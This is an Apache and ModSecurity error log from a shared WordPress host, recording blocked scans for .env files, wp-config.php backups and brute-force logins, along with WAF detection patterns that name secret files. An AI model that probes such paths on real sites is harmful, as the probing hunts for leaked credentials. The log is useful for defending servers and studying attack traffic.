[Tue May 26 17:18:36.491407 2026] [autoindex:error] [pid 869189:tid 869322] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/ID3/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:36.860513 2026] [security2:error] [pid 869189:tid 869393] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIlNB5TZSn88J_orr7ZwAAAEk"]
[Tue May 26 17:18:37.322362 2026] [autoindex:error] [pid 869189:tid 869352] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/assets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:37.553266 2026] [autoindex:error] [pid 869189:tid 869353] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/fonts/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:37.590687 2026] [security2:error] [pid 869189:tid 869421] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIldB5TZSn88J_orr7dAAAAGU"]
[Tue May 26 17:18:37.899270 2026] [security2:error] [pid 869189:tid 869370] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIldB5TZSn88J_orr7hwAAADI"]
[Tue May 26 17:18:38.449195 2026] [security2:error] [pid 869189:tid 869410] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIltB5TZSn88J_orr7pwAAAFo"]
[Tue May 26 17:18:39.307283 2026] [security2:error] [pid 869189:tid 869332] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIltB5TZSn88J_orr7ugAAAAw"]
[Tue May 26 17:18:39.312875 2026] [security2:error] [pid 869189:tid 869403] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIl9B5TZSn88J_orr7xgAAAFM"]
[Tue May 26 17:18:39.783443 2026] [autoindex:error] [pid 869189:tid 869377] [client 185.92.25.54:27643] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:39.852572 2026] [security2:error] [pid 869189:tid 869417] [client 208.84.100.233:31128] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/app/.env"] [unique_id "ahWIl9B5TZSn88J_orr79QAAAGE"]
[Tue May 26 17:18:39.853047 2026] [security2:error] [pid 869189:tid 869323] [client 208.84.100.233:31146] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/backend/.env"] [unique_id "ahWIl9B5TZSn88J_orr79AAAAAM"]
[Tue May 26 17:18:39.853775 2026] [security2:error] [pid 869189:tid 869422] [client 208.84.100.233:31134] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/api/.env"] [unique_id "ahWIl9B5TZSn88J_orr79wAAAGY"]
[Tue May 26 17:18:39.854842 2026] [security2:error] [pid 869189:tid 869331] [client 208.84.100.233:31116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env"] [unique_id "ahWIl9B5TZSn88J_orr7-AAAAAs"]
[Tue May 26 17:18:40.097616 2026] [security2:error] [pid 869189:tid 869424] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIl9B5TZSn88J_orr8BAAAAGg"]
[Tue May 26 17:18:40.565874 2026] [security2:error] [pid 869189:tid 869399] [client 208.84.100.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIl9B5TZSn88J_orr7_wAAAE8"]
[Tue May 26 17:18:40.573222 2026] [security2:error] [pid 869189:tid 869425] [client 208.84.100.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIl9B5TZSn88J_orr8AAAAAGk"]
[Tue May 26 17:18:40.587003 2026] [security2:error] [pid 869189:tid 869380] [client 208.84.100.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIl9B5TZSn88J_orr7_QAAADw"]
[Tue May 26 17:18:40.648965 2026] [security2:error] [pid 869189:tid 869438] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWImNB5TZSn88J_orr8GAAAAHY"]
[Tue May 26 17:18:40.787118 2026] [security2:error] [pid 869189:tid 869249] [remote 103.91.67.202:55782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWImNB5TZSn88J_orr8IQAAeTo"]
[Tue May 26 17:18:41.058266 2026] [autoindex:error] [pid 869189:tid 869361] [client 185.92.25.54:27643] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/css/colors/light/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:41.422152 2026] [autoindex:error] [pid 869189:tid 869363] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:41.519825 2026] [security2:error] [pid 869189:tid 869391] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWImdB5TZSn88J_orr8MQAAAEc"]
[Tue May 26 17:18:41.722145 2026] [security2:error] [pid 869189:tid 869280] [remote 213.171.208.232:54854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWImdB5TZSn88J_orr8QAAAN1k"]
[Tue May 26 17:18:41.914432 2026] [autoindex:error] [pid 869189:tid 869431] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/rest-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:42.287035 2026] [security2:error] [pid 869189:tid 869441] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWImtB5TZSn88J_orr8WwAAAHk"]
[Tue May 26 17:18:43.060970 2026] [security2:error] [pid 869189:tid 869332] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWImtB5TZSn88J_orr8fgAAAAw"]
[Tue May 26 17:18:43.478492 2026] [autoindex:error] [pid 869189:tid 869431] [client 185.92.25.54:27643] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:43.657783 2026] [security2:error] [pid 869189:tid 869400] [client 223.235.98.214:11007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIm9B5TZSn88J_orr8kgAAAFA"]
[Tue May 26 17:18:43.657943 2026] [security2:error] [pid 869189:tid 869400] [client 223.235.98.214:11007] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIm9B5TZSn88J_orr8kgAAAFA"]
[Tue May 26 17:18:43.661577 2026] [autoindex:error] [pid 869189:tid 869343] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/rest-api/endpoints/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:43.967067 2026] [security2:error] [pid 869189:tid 869385] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIm9B5TZSn88J_orr8ngAAAEE"]
[Tue May 26 17:18:44.517630 2026] [security2:error] [pid 869189:tid 869424] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWInNB5TZSn88J_orr8tAAAAGg"]
[Tue May 26 17:18:44.637190 2026] [security2:error] [pid 869189:tid 869370] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWInNB5TZSn88J_orr8qwAAADI"]
[Tue May 26 17:18:44.738441 2026] [security2:error] [pid 869189:tid 869411] [client 203.194.101.7:59958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWInNB5TZSn88J_orr8vgAAAFs"]
[Tue May 26 17:18:44.738618 2026] [security2:error] [pid 869189:tid 869411] [client 203.194.101.7:59958] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWInNB5TZSn88J_orr8vgAAAFs"]
[Tue May 26 17:18:45.181249 2026] [security2:error] [pid 869189:tid 869420] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIndB5TZSn88J_orr8ygAAAGQ"]
[Tue May 26 17:18:45.726432 2026] [security2:error] [pid 869189:tid 869392] [client 208.84.100.233:31228] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIndB5TZSn88J_orr8ywAAAEg"]
[Tue May 26 17:18:45.735839 2026] [autoindex:error] [pid 869189:tid 869326] [client 185.92.25.54:27643] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:46.108159 2026] [security2:error] [pid 869189:tid 869297] [remote 95.216.117.13:50014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWIndB5TZSn88J_orr84AAAa2o"]
[Tue May 26 17:18:46.130167 2026] [security2:error] [pid 869189:tid 869381] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIndB5TZSn88J_orr85gAAAD0"]
[Tue May 26 17:18:46.248775 2026] [security2:error] [pid 869189:tid 869303] [remote 91.206.200.156:31166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.200.206.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWIntB5TZSn88J_orr85wAAE3A"]
[Tue May 26 17:18:46.712375 2026] [autoindex:error] [pid 869189:tid 869447] [client 185.92.25.54:27643] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:46.885305 2026] [security2:error] [pid 869189:tid 869330] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIntB5TZSn88J_orr88AAAAAo"]
[Tue May 26 17:18:46.935371 2026] [security2:error] [pid 869189:tid 869416] [client 157.90.155.240:19784] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWIntB5TZSn88J_orr9AQAAAGA"], referer: http://ucdc.co.in/
[Tue May 26 17:18:47.060566 2026] [security2:error] [pid 869189:tid 869336] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIntB5TZSn88J_orr9AAAAABA"]
[Tue May 26 17:18:47.855876 2026] [autoindex:error] [pid 869189:tid 869375] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/pomo/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:48.376186 2026] [autoindex:error] [pid 869189:tid 869415] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-content/themes/twentytwentythree/patterns/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:48.554018 2026] [security2:error] [pid 869189:tid 869419] [client 208.84.100.233:20182] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/wp-config.php.bak"] [unique_id "ahWIoNB5TZSn88J_orr9NwAAAGM"]
[Tue May 26 17:18:48.554179 2026] [security2:error] [pid 869189:tid 869401] [client 208.84.100.233:20168] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/wp-config.php.old"] [unique_id "ahWIoNB5TZSn88J_orr9OQAAAFE"]
[Tue May 26 17:18:48.632974 2026] [autoindex:error] [pid 869189:tid 869361] [client 185.92.25.54:27643] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:48.655774 2026] [security2:error] [pid 869189:tid 869402] [client 208.84.100.233:31228] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/wp-config.php~"] [unique_id "ahWIoNB5TZSn88J_orr9OwAAAFI"]
[Tue May 26 17:18:48.667900 2026] [security2:error] [pid 869189:tid 869433] [client 208.84.100.233:20178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.100.84.208.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/wp-config.php"] [unique_id "ahWIoNB5TZSn88J_orr9OAAAAHE"]
[Tue May 26 17:18:48.815220 2026] [autoindex:error] [pid 869189:tid 869416] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/block-patterns/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:48.964056 2026] [security2:error] [pid 869189:tid 869365] [client 122.183.33.156:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIoNB5TZSn88J_orr9NgAAAC0"]
[Tue May 26 17:18:49.019004 2026] [autoindex:error] [pid 869189:tid 869350] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/certificates/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:49.061931 2026] [security2:error] [pid 869189:tid 869369] [client 208.84.100.233:31410] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/wp-config.php.save"] [unique_id "ahWIodB5TZSn88J_orr9UwAAADE"]
[Tue May 26 17:18:49.062698 2026] [security2:error] [pid 869189:tid 869421] [client 208.84.100.233:31416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.100.84.208.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.wp-config.php.swp"] [unique_id "ahWIodB5TZSn88J_orr9VAAAAGU"]
[Tue May 26 17:18:49.208016 2026] [security2:error] [pid 869189:tid 869309] [remote 173.249.21.166:57456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWIoNB5TZSn88J_orr9TAAAdXY"]
[Tue May 26 17:18:49.211583 2026] [security2:error] [pid 869189:tid 869440] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIoNB5TZSn88J_orr9QQAAAHg"]
[Tue May 26 17:18:49.257876 2026] [autoindex:error] [pid 869189:tid 869407] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-content/cache/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:49.878971 2026] [security2:error] [pid 869189:tid 869362] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIodB5TZSn88J_orr9ZwAAACA"]
